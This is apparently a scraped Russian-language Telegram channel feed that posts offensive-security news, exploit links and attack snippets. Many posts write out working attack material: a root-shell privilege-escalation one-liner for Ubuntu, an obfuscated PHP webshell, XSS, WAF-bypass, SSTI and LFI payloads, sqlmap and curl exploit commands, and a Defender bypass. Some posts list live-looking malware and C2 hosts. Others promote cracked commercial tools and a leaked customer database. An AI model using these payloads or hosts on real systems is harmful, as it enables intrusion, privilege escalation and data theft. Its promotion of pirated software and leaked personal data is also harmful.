2024-03-29 04:47:15 |
CVE-2024-28085 - Смешная дырка в Linux 😜*Дырке 11 лет, дырка есть в обновлении которое вышло 27 марта 2024 года.Дырка проверена на Ubuntu 22.04 LTS и Debian 12.5Но есть ньюанс, нужно уже быть на сервере.*В общем почитайте, поддельные sudo запросы*POC #linux #sudo |
Images
|
2024-03-28 20:33:54 |
CVE-2023-6546 - GSM Multiplexing Race Condition*сплойт предназначенный для Ubuntu 18.04+20.04 LTS/Centos 8/RHEL 8 и позволяющий получить root-права посредством выполнения произвольного кода ядра в системах SMP.*exploit#linux #lpe |
Images
|
2024-03-28 14:35:44 |
None |
|
2024-03-28 14:30:11 |
Acunetix version 24.2windows + linux февраль 2024 |
|
2024-03-28 08:08:31 |
APT28 - OCEANMAP Backdoor & Exploring(Exploring its C2 Server Artifacts)*Analyzing*YARA#apt28 |
Images
|
2024-03-27 10:25:08 |
Cobalt Strike: Generating beacons for Linux*Ну вдруг вы не знали#cobalt #linux |
Images
|
2024-03-27 09:11:21 |
evolution of security |
Images
|
2024-03-27 05:18:57 |
CVE-2024-1086 Linux LPE *Универсальный эксплойт для повышения локальных привилегий , работающий на большинстве ядер Linux между версиями 5.14 и 6.6, Debian, Ubuntu.*download#linux #lpe |
|
2024-03-27 05:05:42 |
Exploiting CVE-2023-3390 in Linux kernel*Сначала с гита этот спич удалили (схерали ?) пару дней назад, но мы написали ресерчеру INSU YUN, и чувак любезно поделился, а мы делимся с вами, не успев проснуться. КОФЕ !!!*Читаем - One shot, Triple kill#linux #0day #1day |
Images
|
2024-03-26 14:44:16 |
CVE-2023-42931 Apple macOS LPE*Affected:MacOS Sonoma before 14.2MacOS Ventura before 13.6.3MacOS Monterey before 12.7.2*Весь путь тут#macos |
Images
|
2024-03-26 13:24:16 |
Ransom Ryukhttp://95.217.135[.190пасип 😏 |
Images
|
2024-03-26 09:09:28 |
Рубрика "отсыпь скринов"Делаем скриншот из UEFI |
|
2024-03-26 07:53:31 |
CVE-2024-20767 Adobe ColdFusion*Уязвимость чтения файловой системы#adobe |
|
2024-03-26 07:45:58 |
Хороший разбор малвари NanoCore\nancrat *Цепочка: Phishing | Fake Link > ZIP/DOC > Script/Loader > NanoCore > Persistence > Injection > Info Collection > C&C*READ |
Images
|
2024-03-25 20:26:48 |
Remote code execution в FreeBSD и OpenBSD Дырка в NFS*Опа, даже у титанов бывают проблемы |
Images
|
2024-03-24 18:57:17 |
Свежий проект dropperПроект, создает вредоносный дропер с поддержкой макросов Office для боковой загрузки DLL и встраивающий его в файл Lnk для обхода MOTW (функция защиты устройства от вредоносных файлов, загруженных из сети).Download#dropper #dll |
|
2024-03-24 14:17:54 |
CVE-2024-28116 Grav CMSexploit authenticated SSTI+RCEPOC |
|
2024-03-24 13:27:35 |
Где деньги Лебовски ?*NoMoney — это инструмент для сбора информации, который объединяет fofa, Zoomeye , censys, платформу Intergraph от Qi'anxin и 360quake. Как врут видно из названия, возможности этого инструмента на вышеперечисленных платформах бесплатны. *За бесплатным сыром сюда#freecheese #lol |
Images
|
2024-03-23 12:47:37 |
Linux 😊C=$(tput cols);L=$(tput lines);while :;do x=$(($RANDOM%$C));y=$(($RANDOM%$L));printf "\033[${y};${x}fF";done |
|
2024-03-23 12:34:55 |
Exploiting the libwebp Vulnerability, Part 2: Diving into Chrome Blink |
Images
|
2024-03-23 08:44:04 |
хммм, ну оке |
Images
|
2024-03-23 06:26:57 |
CVE-2023-36424Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation exploit |
Images
|
2024-03-15 13:09:42 |
CVE-2023-6817Linux kernel: use-after-free in nf_tables*ДЫрка в ядре Linux nf_tables, приводит к DoS или LPE.Патч в версии linux 6.7-rc5Скомпилять POC можно так:gcc -o poc poc.c -lnftnl -lmnl |
|
2024-03-14 17:01:21 |
На ночь 3 минуты*exploits.club - Weekly Newsletter 12*Link |
Images
|
2024-03-14 12:37:41 |
%3C/script%20%3EилиmitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E#xss |
Images
|
2024-03-14 11:57:30 |
CVE-2024-25153: Remote Code ExecutionFortra FileCatalyst*POC* |
Images
|
2024-03-08 23:11:38 |
Дамы инфобеза, всех с дн0м )))) 8 ))) |
Images
|
2024-03-07 07:31:22 |
Linux Privilege Escalation Cheatsheetпыщь |
Images
|
2024-03-07 06:32:50 |
CVE-2024-1403*Progress OpenEdge Authentication Bypass *exploit proof of concept |
|
2024-03-06 18:15:59 |
Уязвимость DataCube3POC сочетает в себе CVE-2024-25830 (неправильный контроль доступа) для извлечения паролей root и CVE-2024-25832 (неограниченная загрузка файлов) для развертывания reverse shell*POC |
|
2024-03-06 08:02:20 |
Bypass UAC |
Images
|
2024-03-06 07:00:13 |
XieBroC2C&CСлили в открытый доступ все, кроме кода командного сервера. download#C2 |
Images
|
2024-03-06 06:41:24 |
Server Side Template Injection Payload List{7*7}*{7*7}{{7*7}}[[7*7]]${7*7}@(7*7)<?=7*7?><%= 7*7 %>${= 7*7}{{= 7*7}}${{7*7}}#{7*7}[=7*7]если отдает 49 - цель уязвима#SSTI |
|
2024-03-05 20:52:16 |
Рубрика интересноВозможна удаленная атака в стиле Stuxnet с использованием Web-Based PLC Malware: ResearchersLink#stuxnet |
Images
|
2024-03-05 14:09:08 |
CVE-2024-27198обход аутентификации с использованием уязвимости альтернативного пути в JetBrains TeamCity Server*#jets |
|
2024-03-05 13:50:09 |
CVE-2024-21338*Годная статьяLazarus и руткит FudModule: за пределами BYOVD с нулевым днем от администратора до ядра* |
|
2024-02-25 05:06:22 |
None |
Images
|
2024-02-25 05:06:21 |
Ночью LockBit восстановил сервера, и выдал обращение |
|
2024-02-24 05:26:56 |
Banshee*Windows x64 Kernel Rootkit (Experimental)*Умеет:- Kill processes- Change protection levels- Elevate any process token to SYSTEM- Enumerating and erasing kernel callbacks- Protecting the driver file- Hide Process by PID*TODO list - обещает интересное расширение функционала*download win_rootkit#win #rootkit |
|
2024-02-23 21:36:13 |
CVE-2024-1651 exploit (RCE)*Дырка в Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.#exploit #rce #linux |
|
2024-02-23 21:24:12 |
SSH-Snake Tool for ....lulz*Это идеальное сочетание лени, глупости и божьей искры )))То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.Ну не удивительно что черные шляпы мигом взяли на вооружение 😆Правильное название должно быть ssh-wormТДН во все поля )*SSH-Snake *Почитать#worm #ssh |
Images
|
2024-02-21 20:54:10 |
ChatBot для WordPress*SQL-инъекция через параметр $strid в версии до 4.8.9 включительно*ТЫКНУТЬpython3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p stridа я споть |
|
2024-02-21 13:58:28 |
CVE-2024-25600 wordpress Exploit (RCE)*Дыра в плагине Bricks Builder*requirements:alive_progressbs4prompt_toolkitrequestsrich*#RCE #wordpress |
|
2024-02-21 09:13:58 |
ScreenConnect POC* Обход аутентификации для добавления нового пользователя-администратора в ConnectWise ScreenConnect.*Usage:python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!* |
|
2024-02-21 09:10:14 |
Ну понеслась |
|
2024-02-21 08:29:39 |
Linux — это теперь и CNAРубрика - Интересное, проект ядра Linux был принят в качестве органа нумерации CVE (CNA) для выявления уязвимостей, обнаруженных в Linux.Теперь еще и их мониторитьПочитать тут#vuln #linux #security |
Images
|
2024-02-21 04:58:43 |
Ждем exploit для ScreenConnect |
Images
|
2024-02-20 19:02:47 |
ALFA LOL teamhttp://34.101.157.124/bins/ |
Images
|
2024-02-20 13:26:04 |
Побег из VirtualBox 7.0.10ДЫрки в virtio-netПочитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100*exploit#virtualbox #escape |
Images
|
2024-02-19 15:54:00 |
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.Ноги выросли отсюда I-S00NВ общем китайский APT-подрядчик нормально так накинул на вентилятор, от iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше*Ну и да, кого в Китае расстреляютUPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)#APT |
|
2024-02-19 14:12:36 |
В дампе поля:APT41 - коменты будут ?*GUIDABONENT_IDABONENT_NAMELOGINPASSWORDACCOUNT_USR_BLOCK ABONENT_BLOCKDEVICE_BLOCKQUESTION ANSWERACTIVE_DATEDEACTIVE_DATEPACKET_TYPETOWNDEVICESUBSCRIBER_IDADDRESS_ID* |
Images
|
2024-02-19 13:39:02 |
Beeline потёк |
Images
|
2024-02-19 08:33:08 |
BurpSuite PRO version 2024.1.1.1+BurpBountyPro_v2.8.0 ru+eng+manual |
|
2024-02-19 05:24:09 |
KeyTrap in DNS (CVE-2023-50387)*Link |
Images
|
2024-02-18 03:44:31 |
Living off the False Positive*Полезное.Ну прям всем хорошо, blue team могут использовать для настройки своей логики обнаружения вторжений, а red team научиться сливаться с серой массой.LoFP |
Images
|
2024-02-16 12:01:02 |
CVE-2024-21413 Expect Script POC*Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5*Link |
|
2024-02-15 19:12:57 |
Прощай NGINX*ESXI умер пару дней назадтеперь и NGINX умерГлав разраб форкнул проект и теперь будет FreeNginxПочитайте письмо, как эффективные манагеры в очередной раз все обосралиhttps://freenginx.org/pipermail/nginx/2024-February/000000.html*В AUR уже что то появилось#fuck |
Images
|
2024-02-14 18:43:19 |
Грязный BASHоднострочник для быстрого обнаружения XSS в файлах PHP*rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities |
|
2024-02-13 14:33:34 |
CVE-2023-36845 и CVE-2023-36846Juniper Junos OS J-Web RCE*На все это дело есть и сплоит на питонено можно и в curlык*curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' |
Images
|
2024-02-13 08:29:19 |
Свежая техника обхода EDRКому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки DLL EDR.Суть вот в чем, EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда EDR в лохматой жопе.*Статья - Bypassing EDRs With EDR-PreloadingСорцы - EDR-Preloader#EDR #malware |
Images
|
2024-02-12 20:18:04 |
Windows Defender Detection Mitigation Bypass VulnerabilityWin LPEВ 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *то есть было и пофиксили:C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.CVE пока не имеет )#defender #bypass |
Images
|
2024-02-11 17:48:23 |
Bypassing SQL*payload:8%20or%207250%3d0725*для sqlmap:sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast*#sql #bypass |
|
2024-02-11 05:35:32 |
Xbox ? PlayStation ? NoUbiquiti switch ! |
|
2024-02-10 08:03:40 |
В поисках malware инфраструктуры *Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.*Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз*Tracking Malware Infrastructure#malware #c2 |
Images
|
2024-02-10 07:34:10 |
Pwning the Domain: Credentialess/Username*Большой и подробный ман от 7 февраля 2024*read#redteam #win #pwn #cred |
Images
|
2024-02-09 14:13:38 |
LFI*Payload: ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" |
Images
|
2024-02-08 12:23:21 |
внесем немного конкретики о пинах BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.То есть на задней стороне материнки, есть тестовые пады, секурненько )))*Да, это TPM 2.0*Ну и почитать TPM SNIFFING#bitlocker #sniff |
Images
|
2024-02-04 19:04:23 |
x4n4x securityтематы молодец )))) |
|
2024-02-04 09:14:34 |
АДМИН проявись |
|
2024-02-04 05:34:54 |
Утры, как сами? Кофе, ? Давай два?))) |
|
2024-02-02 18:50:39 |
Lenovo X1 Carbon Bitlocker Key Sniffingкруто, 42.9 секунды |
|
2024-02-01 10:04:18 |
CVE-2023-6246: Heap-based buffer overflow in the glibc's syslogPOC(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)всем сегфолта ))))) |
|
2024-02-01 06:38:59 |
Docker 4 сыра дыркиwriteup тута на видео видно как можно заюзать дырку в docker runc#docker #escape |
|
2024-02-01 06:00:42 |
bypass XSS Cloudflare WAFEncoded Payload "><track/onerror='confirm\%601\%60'>Clean Payload "><track/onerror='confirm`1`'>#CF #bypass |
|
2024-01-31 18:35:48 |
Linux Kernel Exploitation (свежая версия)*1 часть - Getting started & BOF 2 часть - Exploiting race-condition + UAF 3 часть - Heap techniques#linux #kernel #hack |
Images
|
2024-01-31 18:30:59 |
LockBit 3.0 - ребят, напишите мне, я вам расскажу за репутационный риск менеджментесть пара мыслей#lockbit |
Images
|
2024-01-30 09:34:29 |
Рекомендуется к прочтениюИнтервью с yashechkaМои поздравления )))*#xman_series |
Images
|
2024-01-30 07:04:26 |
Наконец то была найдена АтлантидаНа легендарный остров-государство обманным путем вывозят Telegram, Steam, данные криптовалютных кошельков, данные браузера, а также пушнину и женщинРенТВ - call mehttp://5.42.64.32/login.php C2 Panel#cc #bot |
Images
|
2024-01-30 06:15:52 |
ARTToolkit*Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam*Link |
Images
|
2024-01-30 04:40:50 |
CVE-2023-35636 Microsoft Outlook, связанная с раскрытием информации (утечка хеша пароля) — Expect Script POC*exploit#outlook |
Images
|
2024-01-23 06:02:33 |
Linux Privileges Escalation Techniques (Basic to Advanced) Series*Part 1: http://hacklido.com/blog/158Part 2: http://hacklido.com/blog/162Part 3: http://hacklido.com/blog/210Part 4: http://hacklido.com/blog/224Part 5: https://hacklido.com/blog/286 |
Images
|
2024-01-19 04:09:00 |
CVE-2023-7028 | Account-Take-Over Gitlab*usage:python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com#gitlab |
|
2024-01-18 20:50:29 |
Cobalt-Strike-Profiles-for-EDR-Evasion+ SourcePoint is a C2 profile generator for Cobalt Strikedownload#cs |
Images
|
2024-01-18 12:33:13 |
#pic #linux |
Images
Images
|
2023-12-15 14:09:01 |
Linux Red Team cat /home/redteam/1- Exploitation Techniques2 - Privilege Escalation Techniques3 - Persistence Techniques4 - Defense Evasion - Hiding Linux Processes5 - Defense Evasion - Rootkits#linux #learn #hack |
|
2023-12-15 06:59:31 |
CVE-2023-49070 - Apache ofbizpre-auth RCE POC#apache |
Images
|
2023-12-15 06:53:46 |
CVE-2023-22524 CVSS: 9,6 Уязвимость в приложении Atlassian Companion для macOS (все версии до 2.0.0)*POC#jira |
|
2023-12-14 17:27:03 |
#Xmas |
Images
Images
|
2023-12-14 10:56:09 |
The Art Of Linux PersistenceDecember 13, 2023Про git backdoor прикольноREAD\download#linux #persist |
Images
|
2023-12-14 06:37:06 |
CVE-2023-6553 Exploit Плагин Backup Migration для WordPress , RCE до версии 1.3.7 включительно *exploit#wordpress #rce |
|
2023-12-12 11:29:38 |
FUCK WAFОт Cloudflare до Imperva, Akamai, F5, Checkpoint, Fortinet#waf #bypass #payload #regexp |
|
2023-12-12 07:50:28 |
А еще утекли сорцы\панельки\билдеры у Ermak и Hookbot#malware |
Images
Images
Images
|
2023-12-12 07:46:02 |
😁 lol#ransom |
Images
|
2023-12-11 10:52:46 |
BurpSuite PRO (version 2023.11.1.2) + +BurpBountyPro_v2.7.0#burp |
|
2023-12-10 09:21:34 |
Концепция (PoC) атаки 5G NR на:смартфоны CPE-маршрутизаторыUSB-модемы5Ghoul — это семейство DoS-уязвимостей 5G на уровне реализации, затрагивающих мобильные платформы Qualcomm и MediaTek.+12 доступных эксплойтов* 5ghoul-5g-nr-attacks* |
Images
|
2023-12-09 20:11:51 |
Используем ssh-keygen для:- произвольного выполнения кода- повышения привилегий- перезаписи файловЗабавно (и закономерно) что вектор подходит как для *nix так и для win*Сам researchДополнительный researchlib2shell#ssh |
Images
|
2023-12-09 14:01:40 |
Shellcode Loader with memory evasion *Jomungand#win #shellcodes |
Images
|
2023-12-08 10:51:45 |
Stratosphere Linux IPSНу казалось бы IPS и IPS, бох с ним что на питоне, ведь есть Machine Learning Models.За то как его активно форсят на BlackHat Europe , BlackHat USA, BlackHat Asia, Hack In The Box, OpenAlt, Ekoparty (?)*DownLoad*#ips #ids #обхсс |
Images
|
2023-12-08 06:44:19 |
Курс по фишингу от SkillFARTory, + реальная возможность трудоустройства + диплом ВШЭ_птуlink |
Images
|
2023-12-07 20:51:45 |
чей ключ от домофона ? https://svn.python.org/www/trunk/advocacy.python.org/etc/server.pem#py |
Images
|
2023-12-07 18:29:51 |
RAThXXp:\\43X249X38x36/ |
Images
|
2023-12-05 19:18:30 |
Тут туса и SLAM интересныйПомните атаки Meltdown и Spectre (Intel, AMD, ARM, POWER) ? Ну так вот, трое пацанов взяли проц i9-13900k, ubuntu с ядром 6.3, сделали эмуляцию intel LAM (в ядре 6.4 Linear Address Masking (intel LAM) уже есть ) и используя наработки Spectre смогли прочитать память ядра.В общем этот вот intel LAM позволил создать в и без того дырявой процессорной архитектуре дополнительный канал слива памяти прямо в жирные лапкиSpectre + Intel LAM = SLAM*Почитать можно ТУТСкачать SLAM ТУТ#proc |
|
2023-12-05 11:21:36 |
Погрузиться в методы использования руткитов режима ядра Windows (+ гипервизор)link#windows #rootkits #modules |
Images
|
2023-12-04 11:46:33 |
CVE-2023-49287TinyDir <= 1.2.5 Buffer overflowProof of concept (c 183 строки) |
|
2023-12-03 09:14:15 |
вернуться в 2000е и задеть струны души за полсекунды 😜 |
|
2023-12-01 08:00:45 |
mini_PHP Payload*<?=`$_GET[0]`?><?=`$_POST[0]`?><?=`{$_REQUEST['_']}`?>*Usage : bashorg.com/path/to/shell.php?0=command*Obfuscation :<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?> |
|
2023-11-28 14:53:04 |
LOOOOLНашли до чего доебаться, еще и тикет открыли ))webshell exists in the project |
|
2023-11-25 07:30:51 |
IDA_pro - 8.3 final release + keygen#IDApro |
|
2023-11-24 19:06:49 |
Active Directory Canarieslink |
Images
|
2023-11-24 06:11:52 |
Надеюсь JOY CASINO |
Images
|
2023-11-23 19:19:04 |
CobaltStrike в Chrome installer с подписью от BreakPoint Software Inc*Strike config |
Images
|
2023-11-23 06:49:44 |
1 - учите питон2 - учите арабский3 - едете в германию работать программистом кассиром в макдач |
Images
|
2023-11-23 06:45:13 |
CVE-2023-49103DetailPOC_exploit (multi-thread) |
|
2023-11-22 20:58:14 |
Мечтает ли товарищ майор об элетроТелеге ? Но не спеши погружаться в философские думы, мой юный друг !Ведь в нашей студии, прости хоспаде - Telegram ExplorerУ которого в описании ЖИР жирокъНу прям RSS на базе православной тележки.Но разговоры в сторону - немедленно выкатываем в продакшен !#Fu |
Images
|
2023-11-22 12:59:55 |
Интересная мультиварка |
|
2023-11-21 12:53:46 |
Это на новый год ! |
Images
|
2023-11-21 10:24:39 |
HavocExploitПраздник у всех любителей фреймфорка Havoc ( post-exploitation command and control framework )*DOS_exploit*Usage:pip install -r requirements.txt./exploit.py -t teamserverip -p port#havoc |
Images
|
2023-11-21 05:22:11 |
Спешим читать свежий выпуск tmpOut 03 за ноябрь 2023 |
Images
|
2023-11-19 06:33:51 |
PassTheCert*Бывает контроллеры домена не поддерживают PKINIT. Это может быть связано с тем, что в их сертификатах нет EKU для входа в систему со смарт-картой. Однако несколько протоколов, включая LDAP, поддерживают Schannel, обеспечивая таким образом аутентификацию через TLS. И вот пацаны с района (возможно Мытищи) создали небольшой инструмент для проверки концепции, который позволяет выполнять аутентификацию на сервере LDAP/S с сертификатом для всяких там атак.*LINK |
Images
|
2023-11-19 06:14:37 |
CVE-2023-46214 - Splunk RCE*Proof of concept exploit#splunk |
|
2023-11-18 12:50:35 |
CVE-2023-4357 Chrome XXE*POCприкольно, осталось песочницу обойти 👌#chrome #sandbox |
Images
Images
|
2023-11-17 19:36:07 |
CVE-2023-47246А вот и 0day который активно юзают рансомы из Cl0p нацеленный на SysAid*exploit* |
Images
|
2023-11-17 06:38:23 |
С днем рождения !!!Сегодня Proxy Bar исполняется 2 года ***Если Вам нравится то что мы делаем, Вы можете нас поддержать:***Bitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#ДеньРождения |
|
2023-11-16 09:34:00 |
Напоминаем ! Завтра пройдет встреча DEFCON Russia** Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен» * Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)* Формат: офлайн + онлайн-трансляция* зарегистрироваться*Приходите, пообщаемся 😜#defcon #spb |
Images
|
2023-11-15 11:43:43 |
#eL_musico #SOF #8bit |
|
2023-11-15 09:49:37 |
OpenVPN CVE-2023-46849 CVE-2023-46850делить на ноль не бросим 😄😄😄 |
|
2023-11-14 15:06:44 |
200+ PDFHacking and Infosec Link |
Images
|
2023-11-14 05:41:25 |
ved-ebpf: Kernel Exploit and Rootkit Detection using eBPFстатья - тутТулза VED-eBPF - тут#kernel #linux #ebpf #rootkit |
Images
|
2023-11-12 19:09:55 |
Это крутоСтудия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм"eBPF: Unlocking the Kernel" |
|
2023-11-10 20:25:00 |
update для CVE-2023-32629 и CVE-2023-2640BashСИшечка такая |
Images
|
2023-11-10 09:42:53 |
CVE-2023-32629 и CVE-2023-2640Ubuntu Privilege Escalation*BASH одной строкой:unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe |
|
2023-11-09 09:00:35 |
Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;— отличать аномалии от легитимного поведения;— понимать мышление злоумышленника;— формулировать и проверять гипотезы о киберугрозах.Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения. |
Images
|
2023-11-08 09:50:13 |
CVE-2023-46604 ActiveMQ RCEexploit + xml#activemq |
Images
|
2023-11-07 15:48:04 |
VEEAM 😋 Это кладезь привилегированных учетных записей (AD, Linux, Cloud)Лежат себе плохо привинченные, осталось только забрать.В общем читаем и погружаемся:1 - From VEEAM to Domain Administrator2 - Decrypting VEEAM Passwords3 - Используем тулзу SharpVeeamDecryptor#veeam #passwd |
Images
|
2023-11-06 20:02:32 |
Надо ребрендинг канала делать, просто золото ) |
Images
|
2023-11-06 19:07:15 |
CVE-2023-46251 - Stored DOM XSSMyBB < 1.8.37usage:[size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size]UPD: impact |
Images
|
2023-11-06 09:09:55 |
CVE-2023-22518Confluence Data Center и Confluence Server*exploit.py |
Images
|
2023-11-05 21:25:48 |
Maltrail - Система обнаружения вредоносного трафикаRCE Exploit (version Maltrail-0.53)*exploit.py |
Images
|
2023-11-04 20:09:59 |
Linux hardening guideИнтересная версия еще одного гайда по усилению безопасности linux.Интересно про ptrace и memory allocatorLINK |
Images
|
2023-11-04 11:04:24 |
Give me a ping, Vasily |
Images
|
2023-11-04 10:59:37 |
List of Awesome CobaltStrike Resources link#cobalt |
Images
|
2023-11-02 13:00:20 |
левая короннаяправая похоронная |
Images
|
2023-11-02 09:31:02 |
exploit for cve-2023-46747 F5 BIG-IP unauthenticated remote code execution *exploit |
Images
|
2023-11-01 18:22:10 |
parts=(" /" "us" ";r" " /" ";b" "in" "; /" "who" "a" "mi" "")command="${parts[0]}${parts[1]}${parts[2]}${parts[3]}${parts[4]}${parts[5]}${parts[6]}${parts[7]}${parts[8]}${parts[9]}${parts[10]}"echo $command | tr -d ' ;' | shecho "00101111 01110101 01110011 01110010 00101111 01100010 01101001 01101110 00101111 01110111 01101000 01101111 01100001 01101101 01101001" | perl -lape '$_=pack"(B8)*",@F' | sh |
Images
|
2023-11-01 18:14:39 |
проклято )) |
Images
|
2023-11-01 18:10:03 |
$(echo -e "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69") |
Images
|
2023-10-31 13:03:03 |
Cisco IOS XECVE-2023-20198POC creates a user named baduser with privilege level 15 |
Images
|
2023-10-31 10:16:33 |
book of secret knowledgeСудя по объему, кто то оцифровал утерянную Александрийскую библиотекуlink |
Images
|
2023-10-30 18:14:52 |
XAMPP v-3.3.0 Buffer Overflow (Unicode + SEH)POC#web #xamp |
|
2023-10-29 06:13:57 |
Просыпаемся, завтракаем 😋 |
Images
Images
|
2023-10-27 20:49:59 |
Собака старая, трюки новые. System Management Mode backdoor for UEFI based platforms*SmmBackdoorNg#backdoor #uefi #smm |
Images
|
2023-10-27 05:53:10 |
RCE on ingress-nginx-controller via Ingress spec.rules.http.paths.path field*Reported June 30, 2022Disclosed October 26, 2023link#nginx #k8s |
|
2023-10-26 09:33:54 |
Script for DDoS attacks by EagleCyberCrew hXXp://47.88.79.56/ECC-DDoS/hXXp://47.88.79.56/succubus/ |
Images
Images
|
2023-10-25 15:10:39 |
None |
|
2023-10-24 20:28:28 |
v2rayNG Xray core and v2fly core client for Android#greypath |
|
2023-10-24 09:45:28 |
CVE-2023-36745MS Exchange Server Privilege Escalationexploit#exchange |
|
2023-10-23 11:53:14 |
😏 |
Images
|
2023-10-22 05:40:03 |
So cool ! ))))link#Назад_в_будущее |
Images
|
2023-10-22 05:19:57 |
Каждый раз смешно )))И мало того, оно даже документировано - Windows Internals part 2#remoteRegistry #135 |
Images
|
2023-10-21 04:50:28 |
CVE-2023-34051VMware Aria Operations for Logs *Technical Deep*Exploit#vmware #bypass #exploit |
Images
|
2023-10-20 18:55:34 |
Cloudflare bypass WAF*Payload:<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;#cloudflare #bypass #waf #xss |
|
2023-10-19 19:54:59 |
Windows rootkit development for red teaming*Part 1 | IntroductionPart 2 | A tale of routines, IOCTLs and IRPsPart 3 | Sailing to the land of the user (and debugging the ship)Part 4 | The call back homePart 5 | Saruman's Manipulation*#malware #windows #rootkit |
|
2023-10-18 18:50:03 |
or winamp 😜#humor |
Images
|
2023-10-18 06:36:14 |
Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))https://ransomware.live/#/status |
Images
|
2023-10-17 10:14:40 |
CVE-2023-2163Linux Kernel: eBPF verifier bug POC |
|
2023-10-16 21:21:29 |
CVE-2023-44487уязвимость в протоколе HTTP/2Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etcПик атаки составлял 389 000 000 (да да) запросов в секунду.Ну и конечно же все это уплыло ))))Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.link 1link 2link 3link 4link 5what the fuck notes #DoS #HA |
Images
|
2023-10-16 16:54:29 |
Windows Exploit Protection Settings (powerSHELL))linkТак, стоп, погодите...))) |
Images
|
2023-10-16 13:27:52 |
Ну только если в майку встроены наручники и трансфер до США )))) |
Images
|
2023-10-16 06:32:59 |
Палестино-израильский конфликтДействующие лица через призму мира хакеров и инфосекаСписки#again2012 |
Images
|
2023-10-15 14:33:39 |
vsftpd (для версии 2.3.4)usage:python3 vsftpd_exploit.py <IP address> <port> <command> |
|
2023-10-15 14:04:39 |
CVE-2023-41993POC#Safari #iOS #iPadOS #macOS |
Images
|
2023-10-15 09:08:43 |
Криво пропатчили cve-2023-33297Получился bitcoin botnet ddos attackВидео + описание#btc |
Images
|
2023-10-15 08:56:59 |
